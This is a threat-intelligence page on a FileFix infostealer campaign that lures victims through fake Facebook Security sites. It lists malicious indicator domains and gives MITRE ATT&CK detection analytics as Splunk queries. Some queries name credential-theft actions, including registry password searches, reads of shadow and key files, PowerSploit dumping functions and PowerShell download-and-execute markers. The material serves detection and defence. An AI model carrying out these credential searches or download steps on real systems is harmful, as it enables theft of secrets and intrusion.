Campaigns
StegoFileFix Infostealer Campaign

StegoFileFix Infostealer Campaign

FileFixSteganographyClickFix VariantPowerShell Malware
A new FileFix attack variant moves beyond proof-of-concept to real-world exploitation. Attackers use multilingual phishing sites posing as Facebook Security to trick victims into pasting commands. The attack hides second-stage payloads inside JPG files using steganography, eventually delivering the StealC infostealer. This campaign shows rapid evolution, layered obfuscation, and global targeting.

Indicators of Compromise

mastercompu.com
thanjainatural.com
elprogresofood.com
facebook.windows-software-updates.com
facebook.windows-software-downloads.com
facebook.meta-software-worldwide.com
facebook.windows-software-updates.cc

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1056.001 - Keylogging


ID

Data Source

Data Component

Detects

DS0027

Driver

Driver Load

Monitor for unusual kernel driver installation activity

DS0009

Process

OS API Execution

Monitor for API calls to the SetWindowsHook, GetKeyState, and GetAsyncKeyState.[2] and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.

DS0024

Windows Registry

Windows Registry Key Modification

Monitor for changes made to windows registry keys or values for unexpected modifications


T1573.001 - Symmetric Cryptography


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).


T1566.002 - Spearphishing Link


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[132][133] URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can help detect links leading to known malicious sites.[2] Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.

Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).

Analytic 1 - Detecting Phishing Emails with Malicious Links

(source="o365_audit" OR source="gmail_logs" OR source="email_gateway")| where (spf="fail" OR dkim="fail" OR dmarc="fail")| where (subject="account security alert" OR subject="urgent action required" OR subject="password reset")| where (url LIKE "%tinyurl.com%" OR url LIKE "%bit.ly%" OR url LIKE "%@%" OR url LIKE "%.xyz" OR url LIKE "%.top")| eval risk_score=case( spf="fail" AND dkim="fail", 9, url LIKE "%@%", 8, url LIKE "%.xyz" OR url LIKE "%.top", 7)| where risk_score >= 7| stats count by _time, sender, recipient, subject, url, risk_score

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Furthermore, monitor network traffic for cloned sites as well as homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).

Analytic 1 - Detecting Clicks on Malicious Links in Phishing Emails

(EventCode=3)OR (source="zeek_http_logs" uri IN (malicious_url_list))OR (source="proxy_logs" url IN (malicious_url_list))| eval risk_score=case( domain IN ("bit.ly", "tinyurl.com"), 8, domain IN (".xyz", ".top"), 7, uri IN (malicious_url_list), 9)| where risk_score >= 7| stats count by _time, host, user, uri, domain, risk_score



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1140 - Deobfuscate/Decode Files or Information


ID

Data Source

Data Component

Detects

DS0022

File

File Modification

Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn’t be further modified) that may coincide with attempts to hide artifacts.

DS0009

Process

Process Creation

Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications and extensions (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.

CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.

Analytic Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic is oriented around the creation of CertUtil.exe processes, which may be used to encode and decode files, including PE and script code. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process.

Analytic 1 - CertUtil with Decode Argument

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="C:\Windows\System32\certutil.exe" AND CommandLine= decode )

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.


T1583.001 - Domains


ID

Data Source

Data Component

Detects

DS0038

Domain Name

Active DNS

Monitor queried domain name system (DNS) registry data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.



Domain Registration

Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.[100] Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.



Passive DNS

Monitor logged domain name system (DNS) data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.


T1055 - Process Injection


ID

Data Source

Data Component

Detects

DS0022

File

File Metadata

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.



File Modification

Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.

DS0011

Module

Module Load

Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.

DS0009

Process

OS API Execution

Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.[95] Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.[96] [97] [98] [99]



Process Access

Monitor for processes being viewed that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.



Process Metadata

Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.[100]



Process Modification

Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.


T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.



Network Traffic Flow

Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.

DS0019

Service

Service Creation

Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045. [4] Deploy an LLMNR/NBT-NS spoofing detection tool.[17]

DS0024

Windows Registry

Windows Registry Key Modification

Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of "0" indicates LLMNR is disabled.


T1087 - Account Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor logs and other sources of command execution history for actions that could be taken to gather information about accounts, including the use of calls to cloud APIs that perform account discovery.

System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

DS0022

File

File Access

Monitor access to file resources that contain local accounts and groups information such as /etc/passwd, /Users directories, and the SAM database.

If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.

DS0009

Process

Process Creation

Monitor for processes that can be used to enumerate user accounts and groups such as net.exe and net1.exe, especially when executed in quick succession.[10] Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.


T1588.001 - Malware


ID

Data Source

Data Component

Detects

DS0004

Malware Repository

Malware Content

Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.[21]



Malware Metadata

Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.


T1552.001 - Credentials In Files


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials).

Analytic 1 - Commands indicating credential searches in files.

(index=security sourcetype="Powershell" EventCode=4104 CommandLine="password" OR CommandLine="credential") OR(index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 CommandLine="password" OR CommandLine="credential") OR(index=os sourcetype="linux_audit" action="execve" CommandLine="password" OR CommandLine="credential" OR CommandLine="passwd" OR CommandLine="secret") OR(index=os sourcetype="macos_secure" event_type="execve" CommandLine="password" OR CommandLine="credential" OR CommandLine="passwd" OR CommandLine="secret")

DS0022

File

File Access

Monitor for files being accessed that may search local file systems and remote file shares for files containing insecurely stored credentials. While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained.

Analytic 1 - Unauthorized access to files containing credentials.

(index=security sourcetype="WinEventLog:Security" EventCode=4663 ObjectName IN ("password", "credential", "secret", "token")) OR(index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetObject IN ("password", "credential", "secret", "token")) OR(index=os sourcetype="linux_audit" action="open" filepath IN ("password", "credential", "passwd", "shadow", ".pem", ".key", "secret", "token")) OR(index=os sourcetype="macos_secure" event_type="open" file_path IN ("password", "credential", "passwd", "shadow", ".pem", ".key", "secret", "token"))

DS0009

Process

Process Creation

Monitor newly executed processes for local file systems and remote file shares for files containing insecurely stored credentials.

Note: Pseudocode Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for command-line instances of searching the Windows Registry for insecurely stored credentials. This can be accomplished using the query functionality of the Reg system utility, by looking for keys and values that contain strings such as "password". In addition, adversaries may use toolkits such as PowerSploit in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality.

Analytic 1 - Credentials in Files & Registry

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")
CommandLine="reg query HKLM /f password /t REG_SZ /s" ORCommandLine="reg query HKCU /f password /t REG_SZ /s" ORCommandLine="Get-UnattendedInstallFile" ORCommandLine="Get-Webconfig" ORCommandLine="Get-ApplicationHost" ORCommandLine="Get-SiteListPassword" ORCommandLine="Get-CachedGPPPassword" ORCommandLine="Get-RegistryAutoLogon*"


T1059.001 - PowerShell


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). [321] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[322] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.

PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe

For this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName \<RemoteHost> creates a remote PowerShell session.

Analytic 1 - Look for unusual PowerShell execution.

sourcetype=WinEventLog:Microsoft-Windows-PowerShell/Operational| search EventCode=4104| eval suspicious_cmds=if(like(Message, "%-EncodedCommand%") OR like(Message, "%Invoke-Expression%") OR like(Message, "%IEX%") OR like(Message, "%DownloadFile%"), "Yes", "No")| where suspicious_cmds="Yes"

DS0011

Module

Module Load

Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).[3][4]

Analytic 1 - Processes loading PowerShell assemblies

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational| search EventCode=7 ImageLoaded IN ("C:\Windows\System32\System.Management.Automation.dll", "C:\Windows\System32\powershell.exe")

DS0009

Process

Process Creation

Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution. PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.

Powershell can be used to hide monitored command line execution such as:

net usesc start

Note: - The logic for Analytic 1 is based around detecting on non-interactive Powershell sessions (i.e., those not launched by a user through explorer.exe). This may lead to false positives when used in a production environment, so we recommend tuning any such analytics by including additional logic (e.g., looking for suspicious parent processes) that helps filter such events.- The logic for Analytic 2 is based around detecting on remote Powershell sessions. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.

Analytic 1 - Non-interactive Powershell Sessions

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="powershell.exe" AND ParentImage!="explorer.exe"

Analytic 2 - Remote Powershell Sessions

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="wsmprovhost.exe" AND ParentImage="svchost.exe"

Analytic 3 - Powershell Execution

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") Image="C:\Windows\\powershell.exe" ParentImage!="C:\Windows\explorer.exe"|stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName



Process Metadata

Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[323]

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Script Block Logging Events

(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104" AND Image="powershell.exe" AND (CommandLine="-enc" OR CommandLine="-ep bypass" OR CommandLine="-noni*")


T1078 - Valid Accounts


ID

Data Source

Data Component

Detects

DS0028

Logon Session

Logon Session Creation

Monitor for newly constructed logon behavior that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).

sourcetype="WinEventLog:Security" EventCode=4624 | stats count by _time, user, src_ip, dest_ip, LogonType| where LogonType IN ("2", "10") // Interactive or RDP logon| eval is_suspicious=if(src_ip!="expected_ip", "True", "False")| where is_suspicious="True"| table _time, user, src_ip, dest_ip, LogonType



Logon Session Metadata

Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.

DS0002

User Account

User Account Authentication

Monitor for an attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.


T1027 - Obfuscated Files or Information


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.

DS0017

Command

Command Execution

Monitor executed commands and arguments for indicators of obfuscation and potentially suspicious syntax such as uninterpreted escape characters (e.g., ^).

Also monitor command-lines for syntax-specific signs of obfuscation, such as variations of arguments associated with encoding.

DS0022

File

File Creation

Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).



File Metadata

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

File-based signatures may be capable of detecting code obfuscation depending on the methods used.[185][186][187]

DS0011

Module

Module Load

Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.[186]

DS0009

Process

OS API Execution

Monitor and analyze calls to functions such as GetProcAddress() that are associated with malicious code obfuscation.[185]



Process Creation

Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

DS0012

Script

Script Execution

Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^).

Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.

DS0024

Windows Registry

Windows Registry Key Creation

Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads.

DS0005

WMI

WMI Creation

Monitor for the creation of WMI Objects and values that may highlight storage of malicious data such as commands or payloads.


T1102.002 - Bidirectional Communication


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts.



Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1001.003 - Protocol Impersonation


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[23]


T1204.001 - Malicious Link


ID

Data Source

Data Component

Detects

DS0022

File

File Creation

Monitor for files created on a system after a user clicks on a malicious link. Look for common download paths and suspicious files with executable extensions.

Analytic 1 - Files downloaded from links and then executed.

sourcetype=Sysmon EventCode=11| search file_path IN ("/Downloads/", "/Temp/")| stats count by file_name file_path user| where file_name LIKE "%.exe" OR file_name LIKE "%.zip" OR file_name LIKE "%.js" OR file_name LIKE "%.docm"

DS0029

Network Traffic

Network Connection Creation

Monitor for network connections to suspicious or external sites shortly after a user clicks on a link, especially if the URL is linked to phishing or malicious activities.

Analytic 1 - Web-based network connections to suspicious destinations.

sourcetype=network_connection| search process_name IN ("chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe") OR src_ip IN ("")



Network Traffic Content

Inspect the content of the network traffic to look for signs of suspicious web traffic, such as phishing links or abnormal HTTP GET/POST requests.

Analytic 1 - Suspicious network traffic content

sourcetype=network_traffic_content| search http_method="GET" OR http_method="POST"| stats count by url domain http_method| where domain NOT IN ("")

Observed Countries10

BD (741)
CN (497)
DE (897)
DO (561)
NP (122)
PE (545)
PH (98)
RS (282)
TN (38)
US (947)